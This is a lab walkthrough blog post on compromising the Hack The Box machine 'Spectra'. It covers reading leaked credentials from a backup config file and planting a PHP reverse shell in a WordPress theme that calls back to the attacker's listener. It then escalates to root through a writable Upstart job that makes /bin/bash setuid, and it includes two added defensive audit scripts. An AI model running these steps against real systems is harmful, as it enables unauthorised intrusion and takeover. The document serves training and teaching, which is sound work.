syselement's Blog
Spectra
Last updated 4 days ago
Intro

Box Info

  • 🔗 Name: Spectra
  • 🎯 Target IP: 10.129.240.86
  • 📈 Difficulty level: 🟩 Easy
  • ⌛ Retire Date: 26 Jun 2021
  • 🐧 OS: Linux


Recon

mkdir -p $HOME/htb/spectra/nmap
cd $HOME/htb/spectra

Start Reconnaissance

# Fast full TCP port scan
nmap -p- --min-rate 10000 10.129.240.86
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-07 14:32 CEST
Nmap scan report for 10.129.240.86
Host is up (0.034s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 6.77 seconds
# Scan open ports with default scripts and version detection
nmap -p 22,80,3306 -sC -sV -vv -oA nmap/spectra 10.129.240.86
# Nmap 7.95 scan initiated Sat Jun  7 14:33:05 2025 as: /usr/lib/nmap/nmap --privileged -p 22,80,3306 -sC -sV -vv -oA nmap/spectra 10.129.240.86
Nmap scan report for 10.129.240.86
Host is up, received reset ttl 63 (0.035s latency).
Scanned at 2025-06-07 14:33:05 CEST for 39s

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey: 
|   4096 52:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a (RSA)
80/tcp   open  http    syn-ack ttl 63 nginx 1.17.4
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.17.4
3306/tcp open  mysql   syn-ack ttl 63 MySQL (unauthorized)

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun  7 14:33:44 2025 -- 1 IP address (1 host up) scanned in 38.78 seconds

Visiting the http://10.129.240.86/ webpage

# Webpage source code
<h1>Issue Tracking</h1>

<h2>Until IT set up the Jira we can configure and use this for issue tracking.</h2>

<h2><a href="http://spectra.htb/main/index.php" target="mine">Software Issue Tracker</a></h2>
<h2><a href="http://spectra.htb/testing/index.php" target="mine">Test</a></h2>

http://spectra.htb/main/ is a WordPress site.

http://spectra.htb/testing/index.php has an error:

  • Error establishing a database connection

Add the discovered hostname to the /etc/hosts file

# e.g. adjust with the found values (IP, hostnames from the page source or ffuf)
sudo sh -c 'echo "10.129.240.86 spectra.htb" >> /etc/hosts' && ping -c 3 spectra.htb

# At the end of the box
# To clean up the last line from the /etc/hosts file
sudo sed -i '$ d' /etc/hosts

Run ffuf to find the directories of the web server.

ffuf -u http://spectra.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt
                        [Status: 200, Size: 283, Words: 22, Lines: 7, Duration: 42ms]
index.html              [Status: 200, Size: 283, Words: 22, Lines: 7, Duration: 33ms]
main                    [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 34ms]
testing                 [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 34ms]

Let's browse http://spectra.htb/testing/ - file listing is enabled

Index of /testing/
../
wp-admin/                                          10-Jun-2020 23:00                   -
wp-content/                                        10-Jun-2020 23:13                   -
wp-includes/                                       10-Jun-2020 23:13                   -
index.php                                          06-Feb-2020 06:33                 405
license.txt                                        10-Jun-2020 23:12               19915
readme.html                                        10-Jun-2020 23:12                7278
wp-activate.php                                    06-Feb-2020 06:33                6912
wp-blog-header.php                                 06-Feb-2020 06:33                 351
wp-comments-post.php                               02-Jun-2020 20:26                2332
wp-config.php                                      28-Oct-2020 05:52                2997
wp-config.php.save                                 29-Jun-2020 22:08                2888
wp-cron.php                                        06-Feb-2020 06:33                3940
wp-links-opml.php                                  06-Feb-2020 06:33                2496
wp-load.php                                        06-Feb-2020 06:33                3300
wp-login.php                                       10-Feb-2020 03:50               47874
wp-mail.php                                        14-Apr-2020 11:34                8509
wp-settings.php                                    10-Apr-2020 03:59               19396
wp-signup.php                                      06-Feb-2020 06:33               31111
wp-trackback.php                                   06-Feb-2020 06:33                4755
xmlrpc.php                                         06-Feb-2020 06:33                3133

Download the files locally

# All files and subdirs
wget -r -np -nH --cut-dirs=1 -P testing/ http://spectra.htb/testing/
grep -Ri administrator testing
# nothing important
grep -Ri password testing

cat testing/wp-config.php.save
# MySQL DB Credentials
DB_NAME - dev
devtest:devteam01
mysql -h spectra.htb -P 3306 -u devtest -p

# ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host '10.10.14.5' is not allowed to connect to this MySQL server
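What turned a stray file into working credentials here was a backup copy (wp-config.php.save) left in a web root with directory listing enabled; since PHP only handles names ending in .php, the copy is served back as plain text. The following audit is an added example written from the defending side and is not part of the original writeup; the function names and the backup name patterns are my own choices:

```shell
#!/bin/sh
# Added example (not from the writeup): find editor/backup copies of
# configuration files that a web server will serve verbatim, and check
# whether an nginx config enables directory listings.

# List files under the web root $1 whose names look like backup or
# editor copies (the patterns are an assumption, extend as needed).
backup_artifacts() {
    webroot="$1"
    find "$webroot" -type f \( -name '*.save' -o -name '*.bak' -o -name '*.orig' \
        -o -name '*.old' -o -name '*~' -o -name '*.swp' -o -name '*.php.*' \) 2>/dev/null | sort
}

# Of those, keep only files that contain WordPress credential defines;
# this is what turned wp-config.php.save into a valid MySQL/WP password.
leaked_credential_files() {
    backup_artifacts "$1" | while IFS= read -r f; do
        if grep -qE "define\([[:space:]]*'DB_(PASSWORD|USER)'" "$f" 2>/dev/null; then
            printf '%s\n' "$f"
        fi
    done
}

# Count "autoindex on;" directives in the nginx config $1.
# Directory listing is what exposed /testing/ in the first place;
# the fix is "autoindex off;" (the default) plus removing the stray files.
nginx_autoindex_on_count() {
    grep -E '^[[:space:]]*autoindex[[:space:]]+on[[:space:]]*;' "$1" 2>/dev/null \
        | wc -l | tr -d ' '
}
```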

Try the same password for the administrator user at the login page:

http://spectra.htb/main/wp-login.php

  • it works with administrator:devteam01

Run a WpScan (just for fun)

mkdir wpscan

wpscan --url=http://spectra.htb/main --enumerate u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.28
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://spectra.htb/main/ [10.129.240.86]
[+] Started: Sat Jun  7 15:06:35 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: nginx/1.17.4
 |  - X-Powered-By: PHP/5.6.40
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://spectra.htb/main/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://spectra.htb/main/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://spectra.htb/main/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://spectra.htb/main/?feed=rss2, <generator>https://wordpress.org/?v=5.4.2</generator>
 |  - http://spectra.htb/main/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentytwenty
 | Location: http://spectra.htb/main/wp-content/themes/twentytwenty/
 | Last Updated: 2025-04-15T00:00:00.000Z
 | Readme: http://spectra.htb/main/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 2.9
 | Style URL: http://spectra.htb/main/wp-content/themes/twentytwenty/style.css?ver=1.2
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://spectra.htb/main/wp-content/themes/twentytwenty/style.css?ver=1.2, Match: 'Version: 1.2'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <=====================================================================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] administrator
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Jun  7 15:06:42 2025
[+] Requests Done: 53
[+] Cached Requests: 6
[+] Data Sent: 13.271 KB
[+] Data Received: 378.852 KB
[+] Memory used: 188.043 MB
[+] Elapsed time: 00:00:06
searchsploit wordpress 5.4.2

Exploits: No Results
Shellcodes: No Results
Papers: No Results

Exploitation

  • https://www.hackingarticles.in/wordpress-reverse-shell/

Insert reverse shell into the WP theme

To get a reverse shell through a WordPress theme's 404 page, follow these steps:

  1. Log in to the WordPress admin panel and navigate to the theme editor

  2. Take note of which theme is currently being edited. Use an inactive theme, e.g. Twenty Nineteen, and locate the 404.php file among the theme's files

  3. Replace the content of the 404.php file with a PHP reverse shell. For example, use a simple bash reverse shell or the code from /usr/share/webshells/php/php-reverse-shell.php, changing the IP address and port to match the attacker machine.

cp /usr/share/webshells/php/php-reverse-shell.php ./rev.php
subl ./rev.php
# Set
$ip = '10.10.14.5';
$port = 1234;

# Copy all the content and paste in the 404.php

Once the 404.php file is updated with the reverse shell code, start a netcat listener on the attacker machine to receive the incoming connection. Access the modified 404.php page by navigating to the appropriate URL, such as

http://spectra.htb/main/wp-content/themes/twentynineteen/404.php

which will trigger the reverse shell.

rlwrap nc -nvlp 1234

# Open
# http://spectra.htb/main/wp-content/themes/twentynineteen/404.php
# Got Reverse shell

connect to [10.10.14.5] from (UNKNOWN) [10.129.240.86] 37162
Linux spectra 5.4.66+ #1 SMP Tue Dec 22 13:39:49 UTC 2020 x86_64 AMD EPYC 7513 32-Core Processor AuthenticAMD GNU/Linux
 07:21:57 up 8 min,  0 users,  load average: 0.01, 0.13, 0.09
USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
uid=20155(nginx) gid=20156(nginx) groups=20156(nginx)
bash: cannot set terminal process group (4291): Inappropriate ioctl for device
bash: no job control in this shell

nginx@spectra / $ id
id
uid=20155(nginx) gid=20156(nginx) groups=20156(nginx)
cat /etc/*rele*

BUILD_NUMBER=22
CHROMEOVER_BUILD_COMMIT=829e617e7b8467c355f9bd61f87835bfeb0da547
CHROMIUMOS_MANIFEST_COMMIT=38c4f6ca60a47f7fabf0fcd5d6feabf349e3f002
CHROMIUM_BROWSER_COMMIT=ef24d0b3349c2324d18a3f32bc35d14e796aeddc
PIPELINE_TAG=prod
USE_FLAGS=-cros-debug beerover virtualbox
GOOGLE_RELEASE=87.3.41
CHROMEOS_RELEASE_BRANCH_NUMBER=85
CHROMEOS_RELEASE_TRACK=stable-channel
CHROMEOS_RELEASE_KEYSET=devkeys
CHROMEOS_RELEASE_NAME=Chromium OS
CHROMEOS_AUSERVER=https://cloudready-free-update-server-2.neverware.com/update
CHROMEOS_RELEASE_BOARD=chromeover64
CHROMEOS_DEVSERVER=https://cloudready-free-update-server-2.neverware.com/
CHROMEOS_RELEASE_BUILD_NUMBER=13505
CHROMEOS_CANARY_APPID={90F229CE-83E2-4FAF-8479-E368A34938B1}
CHROMEOS_RELEASE_CHROME_MILESTONE=87
CHROMEOS_RELEASE_PATCH_NUMBER=2021_01_15_2352
CHROMEOS_RELEASE_APPID=87efface-864d-49a5-9bb3-4b050a7c227a
CHROMEOS_BOARD_APPID=87efface-864d-49a5-9bb3-4b050a7c227a
CHROMEOS_RELEASE_BUILD_TYPE=Developer Build - neverware
CHROMEOS_RELEASE_VERSION=87.3.41
CHROMEOS_RELEASE_DESCRIPTION=87.3.41 (Developer Build - neverware) stable-channel chromeover64
cat: /etc/wireless-regdb: Is a directory
ls -lah /opt

cat /opt/autologin.conf.orig
# Copyright 2016 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
description   "Automatic login at boot"
author        "chromium-os-dev@chromium.org"
# After boot-complete starts, the login prompt is visible and is accepting
# input.
start on started boot-complete
script
  passwd=
  # Read password from file. The file may optionally end with a newline.
  for dir in /mnt/stateful_partition/etc/autologin /etc/autologin; do
    if [ -e "${dir}/passwd" ]; then
      passwd="$(cat "${dir}/passwd")"
      break
    fi
  done
  if [ -z "${passwd}" ]; then
    exit 0
  fi
  # Inject keys into the login prompt.
  #
  # For this to work, you must have already created an account on the device.
  # Otherwise, no login prompt appears at boot and the injected keys do the
  # wrong thing.
  /usr/local/sbin/inject-keys.py -s "${passwd}" -k enter
end script

Privilege Escalation

find / -type f -iname passwd 2>/dev/null

/usr/share/baselayout/passwd
/usr/bin/passwd
/etc/passwd
/etc/autologin/passwd
/etc/pam.d/passwd

cat /etc/autologin/passwd
SummerHereWeCome!!
cat /etc/passwd | grep -v false

root:x:0:0:root:/root:/bin/bash
chronos:x:1000:1000:system_user:/home/chronos/user:/bin/bash
nginx:x:20155:20156::/home/nginx:/bin/bash
katie:x:20156:20157::/home/katie:/bin/bash
  • Get a shell as katie. SSH with katie:SummerHereWeCome!!

# From Kali
ssh katie@spectra.htb

Get Flags

# User Flag
cat /home/katie/user.txt
e89d2***************************
groups
katie developers

sudo -l
User katie may run the following commands on spectra:
    (ALL) SETENV: NOPASSWD: /sbin/initctl

/sbin/initctl is the control interface for the Upstart init system (used on some older Ubuntu and Debian releases, e.g. Ubuntu ≤ 15.04). It manages jobs defined in /etc/init/*.conf, and the script stanza of each job runs as root. If you can write or modify an Upstart job file and (re)start it through sudo initctl, you can escalate privileges.

sudo /sbin/initctl list
find / -type f -group developers 2>/dev/null -ls

ls -lah /etc/init/test.conf 
-rw-rw---- 1 root developers 478 Jun 29  2020 /etc/init/test.conf

ls -lah /etc/init/*.conf | grep rw-rw
-rw-rw---- 1 root developers  478 Jun 29  2020 /etc/init/test.conf
  • Since katie is in the developers group, she can modify the test.conf job file

sudo /sbin/initctl stop test

vim /etc/init/test.conf

# Under "script" add the following line
    chmod +s /bin/bash

# Run the service
sudo /sbin/initctl start test
  • Get a shell as root:

/bin/bash -p
bash-4.3# id
uid=20156(katie) gid=20157(katie) euid=0(root) egid=0(root) groups=0(root),20157(katie),20158(developers)
cat /root/root.txt
d4451***************************
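The escalation above needs two things together: a job file under /etc/init that a non-root group can write, and a passwordless sudo rule for /sbin/initctl. As an added example written for the defending side (not from the original writeup), this audit checks a host for that combination; the function names are mine, and both paths can be pointed at test copies or at saved `sudo -l` output:

```shell
#!/bin/sh
# Added example (not from the writeup): detect the Spectra privesc condition,
# a group/world-writable Upstart job plus a passwordless sudo rule for initctl.

# Print every *.conf job file in $1 (default /etc/init) that is writable by
# group or others. Upstart runs the job's script stanza as root, so any such
# file is a root-equivalent write for its owning group.
writable_upstart_jobs() {
    job_dir="${1:-/etc/init}"
    find "$job_dir" -maxdepth 1 -type f -name '*.conf' \
        \( -perm -020 -o -perm -002 \) 2>/dev/null | sort
}

# Print non-comment lines of $1 (a sudoers file or saved "sudo -l" output)
# that grant initctl, tagging NOPASSWD (no interaction needed) and SETENV
# (caller controls the environment of the command run as root).
initctl_sudo_rules() {
    sudoers_file="${1:-/etc/sudoers}"
    grep -E '^[^#].*initctl' "$sudoers_file" 2>/dev/null |
    while IFS= read -r line; do
        flags=""
        case "$line" in *NOPASSWD*) flags="$flags NOPASSWD";; esac
        case "$line" in *SETENV*) flags="$flags SETENV";; esac
        printf '%s ::%s\n' "$line" "${flags:- none}"
    done
}

# Combine both checks: return 1 when a writable job file coexists with a
# passwordless initctl rule, which is exactly the chain used on this box.
audit_upstart_privesc() {
    wjobs="$(writable_upstart_jobs "$1")"
    rules="$(initctl_sudo_rules "$2")"
    [ -n "$wjobs" ] && printf 'writable job files:\n%s\n' "$wjobs"
    [ -n "$rules" ] && printf 'initctl sudo rules:\n%s\n' "$rules"
    if [ -n "$wjobs" ] && printf '%s\n' "$rules" | grep -q NOPASSWD; then
        echo "FAIL: writable Upstart job + passwordless initctl"
        return 1
    fi
    echo "OK"
    return 0
}
```

The remediation the audit points at is the one a defender would apply here: job files in /etc/init owned root:root with mode 0644, and no NOPASSWD rule for initctl.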

Post Exploitation

cat script.sh
sudo mount -o rw,remount /
rm -f /usr/local/data/ib_logfile*
/usr/sbin/sshd
startnginx
/usr/local/bin/php5-fpm start
/usr/local/bin/mysqld_safe --bind-address=0.0.0.0 --user=chronos &
/usr/local/bin/vmtoolsd &

for i in {1..10}; do
  iptables -F
  iptables -X
  iptables -t nat -F
  iptables -t nat -X
  iptables -t mangle -F
  iptables -t mangle -X
  iptables -P INPUT ACCEPT
  iptables -P FORWARD ACCEPT
  iptables -P OUTPUT ACCEPT
  stop powerd
  sleep 15
done

stop ui

i=0
while true; do
  i=$((i+1))
  sleep 60
  /bin/cp -p /root/test.conf /etc/init/test.conf
  /bin/cp -p /root/test.conf /etc/init/test1.conf
  /bin/cp -p /root/test.conf /etc/init/test2.conf
  /bin/cp -p /root/test.conf /etc/init/test3.conf
  /bin/cp -p /root/test.conf /etc/init/test4.conf
  /bin/cp -p /root/test.conf /etc/init/test5.conf
  /bin/cp -p /root/test.conf /etc/init/test6.conf
  /bin/cp -p /root/test.conf /etc/init/test7.conf
  /bin/cp -p /root/test.conf /etc/init/test8.conf
  /bin/cp -p /root/test.conf /etc/init/test9.conf
  /bin/cp -p /root/test.conf /etc/init/test10.conf
  /bin/cp -p /root/nodetest.js /srv/nodetest.js

  if [[ "$i" -gt 10 ]]; then
    i=0
    /bin/rm -rf /usr/local/share/nginx/html/main/
    /bin/cp -rp /root/main /usr/local/share/nginx/html/
  fi
done

Extra

  • https://0xdf.gitlab.io/2021/06/26/htb-spectra.html
  • Spectra - Ippsec
  • Spectra - hackthebox.com